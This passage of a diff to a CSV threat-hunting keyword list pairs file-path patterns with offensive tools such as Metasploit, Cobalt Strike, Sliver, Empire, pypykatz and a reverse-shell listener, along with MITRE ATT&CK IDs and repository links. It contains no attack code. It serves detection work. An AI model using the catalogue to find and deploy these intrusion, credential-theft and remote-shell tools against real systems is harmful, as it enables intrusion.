security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/sqli/mysqli*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/sqli/postgresqli*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. 
and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/sqli/sqlitei*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/sqli/utils*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. 
and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/sqli_test.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/Sqlmap*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1059 - T1553 - T1574 - T1210 - T1220","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" "*/sqlmap.zip*","offensive_tool_keyword","sqlipy","SQLiPy is a Python plugin for Burp Suite that integrates SQLMap using the SQLMap API.","T1190 - T1210 - T1574","TA0002 - TA0040 - TA0043","N/A","N/A","Network Exploitation tools","https://github.com/codewatchorg/sqlipy","1","1","N/A","N/A","3","247","102","2023-05-08T18:50:41Z","2014-09-22T03:25:42Z" "*/SQLRecon*","offensive_tool_keyword","SQLRecon","A C# MS SQL toolkit designed for offensive reconnaissance and post-exploitation","T1003.003 - T1049 - T1059.005 - T1078.003","TA0005 - TA0006 - TA0002 - TA0004","N/A","N/A","Network Exploitation Tools","https://github.com/skahwah/SQLRecon","1","1","N/A","N/A","6","502","97","2023-08-10T00:42:31Z","2021-11-19T15:58:49Z" "*/sqrtZeroKnowledge/CVE-*","offensive_tool_keyword","poc","Exploit for the CVE-2023-23398","T1068 - T1557.001 - T1187 - T1212 -T1003.001 - T1550","TA0003 - TA0002 - TA0004","N/A","N/A","Exploitation tools","https://github.com/sqrtZeroKnowledge/CVE-2023-23397_EXPLOIT_0DAY","1","1","N/A","N/A","2","158","46","2023-03-15T17:53:53Z","2023-03-15T17:03:38Z" "*/src/exploit.html.tpl*","offensive_tool_keyword","POC","Just another PoC for the new MSDT-Exploit","T1190 - 
T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/komomon/CVE-2022-30190-follina-Office-MSDT-Fixed","1","1","N/A","N/A","4","387","57","2023-04-13T16:46:26Z","2022-06-02T12:33:18Z" -"*/src/john.com*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*/src/jumbo.c*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*/src/jumbo.h*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*/src/nysm.c*","offensive_tool_keyword","nysm","nysm is a stealth post-exploitation container","T1610 - T1037 - T1070","TA0005 - TA0002 - TA0003","N/A","N/A","POST Exploitation tools","https://github.com/eeriedusk/nysm","1","0","N/A","10","1","30","3","2023-09-30T21:17:33Z","2023-09-25T10:03:52Z" -"*/src/RecycledGate.h*","offensive_tool_keyword","RecycledInjector","Native Syscalls Shellcode Injector","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/florylsk/RecycledInjector","1","1","N/A","N/A","3","213","35","2023-07-02T11:04:28Z","2023-06-23T16:14:56Z" +"*/src/john.com*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential 
Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*/src/jumbo.c*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*/src/jumbo.h*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*/src/nysm.c*","offensive_tool_keyword","nysm","nysm is a stealth post-exploitation container","T1610 - T1037 - T1070","TA0005 - TA0002 - TA0003","N/A","N/A","POST Exploitation tools","https://github.com/eeriedusk/nysm","1","0","N/A","10","1","32","3","2023-09-30T21:17:33Z","2023-09-25T10:03:52Z" +"*/src/RecycledGate.h*","offensive_tool_keyword","RecycledInjector","Native Syscalls Shellcode Injector","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/florylsk/RecycledInjector","1","1","N/A","N/A","3","214","35","2023-07-02T11:04:28Z","2023-06-23T16:14:56Z" "*/src/Sleeper.cpp*","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files (BOF) for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 
- T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/crypt0p3g/bof-collection","1","1","N/A","10","10","151","25","2022-12-05T04:49:33Z","2021-01-20T06:07:38Z" -"*/srdi-shellcode.go*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" +"*/src/unixshell.rs*","offensive_tool_keyword","rustcat","Rustcat(rcat) - The modern Port listener and Reverse shell","T1090.001 - T1090.002 - T1046","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/robiot/rustcat","1","1","N/A","10","10","574","56","2023-10-02T11:32:12Z","2021-06-04T17:03:47Z" +"*/srdi-shellcode.go*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" "*/ssh2-enum-algos.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ssh-auth-methods.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ssh-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" 
@@ -5464,22 +5524,22 @@ "*/sslv2.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/sslv2-drown.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ssp/decryptor.py","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" -"*/SspiUacBypass.git*","offensive_tool_keyword","SspiUacBypass","Bypassing UAC with SSPI Datagram Contexts","T1548.002","TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/SspiUacBypass","1","1","N/A","10","2","167","27","2023-09-24T17:33:25Z","2023-09-14T20:59:22Z" +"*/SspiUacBypass.git*","offensive_tool_keyword","SspiUacBypass","Bypassing UAC with SSPI Datagram Contexts","T1548.002","TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/SspiUacBypass","1","1","N/A","10","2","183","27","2023-09-24T17:33:25Z","2023-09-14T20:59:22Z" "*/ssploit/*","offensive_tool_keyword","spoolsploit","A collection of Windows print spooler exploits containerized with other utilities for practical exploitation.","T1204 - T1547 - T1562 - T1003 - T1018 - T1570 - T1005","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - 
TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/BeetleChunks/SpoolSploit","1","1","N/A","N/A","6","533","90","2021-07-16T04:49:43Z","2021-07-07T00:32:28Z" -"*/SSRFmap*","offensive_tool_keyword","SSRFmap","Automatic SSRF fuzzer and exploitation tool","T1210 - T1211 - T1212 - T1574","TA0002 - TA0007 - TA0008","N/A","N/A","Exploitation tools","https://github.com/swisskyrepo/SSRFmap","1","1","N/A","N/A","10","2463","459","2023-05-27T19:30:08Z","2018-10-15T19:08:26Z" +"*/SSRFmap*","offensive_tool_keyword","SSRFmap","Automatic SSRF fuzzer and exploitation tool","T1210 - T1211 - T1212 - T1574","TA0002 - TA0007 - TA0008","N/A","N/A","Exploitation tools","https://github.com/swisskyrepo/SSRFmap","1","1","N/A","N/A","10","2464","458","2023-05-27T19:30:08Z","2018-10-15T19:08:26Z" "*/sstp-discover.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/StackCrypt.git*","offensive_tool_keyword","StackCrypt","Create a new thread that will suspend every thread and encrypt its stack then going to sleep then decrypt the stacks and resume threads","T1027 - T1055.004 - T1486","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/StackCrypt","1","1","N/A","9","2","144","23","2023-08-02T02:25:12Z","2023-04-26T03:24:56Z" "*/stage_wmi*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*/stager.ps1*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*/stager/powershell.py*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*/stager/powershell/payload.ps1*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" -"*/stagers/*.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1066","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - 
","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*/stagers/*.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1066","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*/stagers/CSharpPS*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - 
T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" "*/start_campaign.py*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" "*/StaticSyscallsAPCSpawn/*","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - 
T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ajpc500/BOFs","1","1","N/A","10","10","475","115","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z" "*/StaticSyscallsInject/*","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ajpc500/BOFs","1","1","N/A","10","10","475","115","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z" -"*/StayKit.cna*","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Persistence","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - 
T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/0xthirteen/StayKit","1","1","N/A","10","10","448","81","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z" -"*/Staykit/StayKit.*","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Persistence","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - 